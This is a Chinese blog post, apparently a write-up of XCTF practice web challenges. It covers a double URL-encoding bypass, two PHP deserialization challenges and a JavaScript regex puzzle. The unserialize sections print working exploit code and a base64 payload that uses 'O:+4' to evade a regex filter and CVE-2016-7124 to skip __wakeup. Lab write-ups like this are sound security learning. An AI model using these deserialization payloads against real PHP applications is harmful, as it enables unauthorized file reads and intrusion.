攻防世界 web进阶1

已于 2022-05-03 21:23:30 修改
阅读量211 收藏
点赞数 1
文章标签: web安全
于 2022-03-30 21:16:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63231007/article/details/123712241
版权

003PHP2

御剑扫描,得到存在index.phps.

通过index.phps查看源码得知:

代码审计得知,我们需要将传递的id,经过浏览器自动url解码,与urldecode()函数两次解码后等于admin,才可得到flag。使用burp_suite decoder模块

得知%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65两次url解码后为admin。将其传入id,得到flag。

004 Web_php_unserialize

首先看到源码,出现敏感函数wakeup,考虑绕过反序列化.

分析:$this->file != 'index.php//如果界面不为index.php
$this->file = ‘index.php’; //界面就强制改为index.php

我们要看到fl4g.php里面的内容,就需要 绕过preg_match, __wakeup().

分析代码:

if (isset($_GET['var'])) { //判断var变量是否存在并且非NULL
    $var = base64_decode($_GET['var']); //bse64解密var
    if (preg_match('/[oc]:\d+:/i', $var)) { //正则匹配$var
        die('stop hacking!'); //停止脚本并输出stop hacking!
    } else {
        @unserialize($var); //反序列化$var
    }
} else {
    highlight_file("index.php"); //对index.php进行语法高亮显示
}

oc: 正则表达式

\d 匹配一个数字字符,等价于[0~9];

+ 匹配前面的子表达式一次或多次.

/i 表示匹配时不区分大小写。所以这个正则表达式是匹配有无数字。
实例化构造然后payload

<?php 

class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
    $A = new Demo('fl4g.php');
    $b = serialize($A);
    //string(49) "O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}"
    $b = str_replace('O:4', 'O:+4',$b);//绕过preg_match
    $b = str_replace(':1:', ':2:',$b);//绕过wakeup
   //string(49) "O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}"
    echo (base64_encode($b));
  //TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
 ?>

用+4替换成4是为了绕过preg_match的正则表达式

同样的把1替换成2是利用了CVE-2016-7124的漏洞,即当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行

CVE-2016-7124:__wakeup失效,当属性个数不正确时,PHP不会调用__wakeup(),所以修改属性个数1为2.

最后按照题目的意思encode一下base64就获取反序列化的结果,get传参即可(在php环境下)

012 unserialize3

wakeup()看出这道题与上一题一样,是序列化的题。

首先对xctf这个类进行序列化,然后绕过这个_wakeup()函数。

利用CVE漏洞,更改属性个数1为2,跳过 _wakeup()执行。得到flag。

对xctf这个类序列化。 O:4:"xctf":2:{s:4:"flag";s:3:"111";}

其中,O表示这是一个对象,4表示对象名的长度,xctf则是序列化的对象的名称,2表示对象中存在的三个属性。属性s表示字符串,i表示整数型。4是属性名的长度,后面说明属性名为flag,之后第二个属性s是字符串,3是属性名长度,后面说明属性名为111.

 

011 NaNNaNNaNNaN-Batman

首先下载文件后,记事本打开得知是一个script乱码,我们把后缀改成.html打开的话,发现只有一个输入框,没有其他的。把txt里面最后的eval换成alert打开,得到一段js代码,然后开始审计.

function $(){

        var e=document.getElementById("c").value;

        if(e.length==16) //应该构造长度为16

        if(e.match(/^be0f23/)!=null) //开头匹配到beof23

        if(e.match(/233ac/)!=null) //e中含有233ac

        if(e.match(/e98aa$/)!=null) //结尾匹配到e98aa

        if(e.match(/c7be9/)!=null){   //e中含有c7be9

                var t=["fl","s_a","i","e}"];

                var n=["a","_h0l","n"];

                var r=["g{","e","_0"];

                var i=["it'","_","n"];

                var s=[t,n,r,i];

                for(var o=0;o<13;++o){

                        document.write(s[o%4][0]);

                        s[o%4].splice(0,1)}        

                }                

}

        document.write('<input id="c"><button onclick=$()>Ok</button>');

        delete _

代码可匹配出,e=be0f233ac7be98aa.

把alert改回eval,在输入框输入be0f233ac7be98aa,得到flag。

葫芦娃42
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界web 进阶1~5
yu_jing_hong的博客
11-26 2469
1.baby_web 找初始页面 一般的,初始页面是index.php,就在地址栏进入,但发现还是会回调到1.php这个页面,那么接在在开发者工具打开network查看index.php的情况。 得到响应头里的flag ,结束。 补充一点知识 302状态码:302 表示临时性重定向。访问一个Url时,被重定向到另一个url上。常用于页面跳转。 在响应头中加入Location参数。浏览器接受到带有location头的响应时,就会跳转到相应的地址。 如下方的,location跳转地址是1.ph
攻防世界 webj进阶
舞动的獾
08-01 1578
cat 攻防世界cat 原理: php cURL CURLOPT_SAFE_UPLOAD django DEBUG mode Django使用的是gbk编码,超过%F7的编码不在gbk中有意义 当 CURLOPT_SAFE_UPLOAD 为 true 时,如果在请求前面加上@的话phpcurl组件是会把后面的当作绝对路径请求,来读取文件。当且仅当文件中存在中文字符...
CTF必看~ PHP反序列化漏洞6:绝妙_wakeup绕过技巧
Eason_LYC安全白帽子的成长博客
05-22 3508
_wakeup()是 PHP 中一个特殊的魔术方法。它在反序列化一个对象时被自动调用,允许开发者在对象从序列化格式还原为可用的 PHP 对象之前对其进行某些特殊处理。这个方法可以接受任意的参数,但在实际使用中,它通常不需要参数。
php反序列化学习及简单的反序列化漏洞介绍
L1ni01
10-13 447
php反序列化学习经历 1.为什么会有序列化和反序列化 我们在开发的过程中常常遇到需要把对象或者数组进行序列号存储,反序列化输出的情况。特别是当需要把数组存储到mysql数据库中时,我们时常需要将数组进行序列号操作。 序列化(串行化):是将变量转换为可保存或传输的字符串的过程; 反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。 这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。 2.相关函数 serialize是序列化函数 先看看数组的序列化 <?php $x
WEB安全-PHP反序列化漏洞原理
qq_59350385的博客
04-11 1718
一、漏洞原理 在提及漏洞前,首先要先理解PHP中的serialize()和unserialize()两个函数(由于没有PHP开发基础,请各位大哥指出小弟本文中的错误),serizlize()就是将变量、对象、数组等数据类型转换成字符串方便进行网络传输和存储,再通过unserialize()将字符串进行转换成原来的数据。当存在反序列化函数及可利用魔术方法时,且unserialize()接受到的字符串对于用户是可控时,用户可针对使用的magic function(魔术方法)来构造特定的语句,从而达到控制整个反
PHP反序列化笔记
大方子
01-16 4053
目录 文章目录目录private变量与protected变量序列化后的特点序列化后的字段长度前面可以加 +题目解题步骤CVE-2016-7124漏洞介绍演示代码题目解题步骤PHP Session 反序列化PHP的3种序列化处理器安全问题当 session.auto_start=Off 时测试Demo题目解题步骤phar反序列化 private变量与protected变量序列化后的特点 \x00 +...
ctf每日练习-第一天
想变得强大,虽然现在还弱不禁风
08-28 541
unserialize3(来自xctf web进阶区) unserialize3题目链接 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 原理: PHP反序列化漏洞:执行unserialize()时,先会调用__wakeup()。 当序列化字符串中属性值个数大于属性个数,就会导致反序列化异常,从而跳过__wakeup()。 本题_wakeup会执行exit(),所以要绕
攻防世界—-(web进阶)FlatScience–WP
12-14
1.login.php 2.admin.php (还有一个robots.txt, 打开之后也是指向上面两个页面的) 先试一下admin.php,尝试几个密码登陆没有结果。 查看页面源代码 有提示,就先暂时先不考虑弱口令 打开另一个页面login.php 查看源...
课程1-网络攻防技术概述与课程简介1
08-03
课程简介-主要内容(2)四、网络攻防技术进阶10. 程序安全攻防:缓冲区溢出和Shellcode11. Web应用安全攻防12. 浏览器安全攻防13. 无线网络
android安全攻防实战
04-15
android进阶的数目是你通向Android高阶工程师道路首选的一本书。
计算机网络安全分析和网络攻防SIEM系统建设
06-16
网络安全是一个涉及多个领域的广泛话题,...网络安全入门5天速成教程 :百度经验提供的教程,帮助读者快速掌握WEB安全渗透攻防技术。 网络攻防教程 :Bilibili上的教程,从入门到高级,涵盖计算机网络基础到渗透测试。
2021年网络安全学习路线指导.docx
05-17
对于想学习网络安全进阶相关知识的学习者,可以学习代码审计能力和web 渗透测试与漏洞挖掘能力等技能等。 本文档是一个非常有价值的资源,对于想学习网络安全的人来说是一个非常重要的参考资料。 知识点: 1. ...
[ 攻防世界 ] web进阶
Dannie01的博客
11-23 884
目的:练习做题手感和思路 CAT 搜索框搜索 弹出?url= 猜测是SSRF,所有协议均被过滤 http:// file:/// dict:// gopher:// 回归题目和描述,由CAT联想是命令执行,依然是 invalid url 思路切入点 invalid url => fuzz fuzz是我思路和实践弱项,积累 ?url=%88 宽字节,获取报错信息 html源码 复制粘贴本地查看 看到了熟悉的django报错页面,看来是将输入的参数传到了后端的django服务中进行解析,而d.
攻防世界-WEB进阶区-bug
qq_64966153的博客
07-04 1075
攻防世界 bug靶场
攻防世界 web进阶区 shrine
m0_51395584的博客
06-22 366
攻防世界 web进阶区 shrine python的flask框架代码审计,以及相关漏洞利用
攻防世界-web高手进阶
zji
04-25 4860
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
攻防世界web新手部分,进阶部分
舞动的獾
04-08 4726
title: 攻防世界第一题 date: 2019-04-08 19:31:23 author: 舞动之獾 top: false cover: true coverImg: https://img-blog.csdnimg.cn/20190408193755785.PNG categories: Markdown tags: web 网络安全 攻防世界新手第一题writeup 点击传送地址...
攻防世界 web进阶笔记
weixin_43928140的博客
06-03 1813
0x02 NaNNaNNaNNaN-Batman 首先下载附件得到web100,用notepad++打开看下,是一些js乱码 我把源码贴到下面 <script>_='function $(){e=getEleById("c").value;length==16^be0f23233ace98aa$c7be9){tfls_aie}na_h0lnrg...
【网络安全的神秘世界】AppScan安装及使用指南
最新发布
weixin_54750312的博客
06-16 287
动态的web扫描,爬取目标网站的接口、链接,通过扫描器自身的扫描逻辑去发送一些特定的http请求数据包,根据服务端的返回内容来判断存在哪些漏洞。AppScan是一种综合型漏洞扫描工具,采用SaaS解决方案,它将所以测试功能整合到一个服务中,避免了因操作系统不同带来的安装问题。ASoC使用安装在应用程序上的代理,通过监控所有的交互流量,在应用程序运行期间识别安全漏洞。checkmark:非编译扫描,代码是什么样它就什么样。fortify:编译扫描,需要一定的环境依赖。动态分析(DAST)——黑盒扫描。
攻防世界web fileclude
07-27
攻防世界中的文件包含漏洞(File Inclusion Vulnerability)是一种常见的web安全漏洞。它主要出现在web应用程序中,当应用程序动态包含用户可控制的文件时,如果没有正确过滤和验证用户输入,攻击者可以利用这个漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值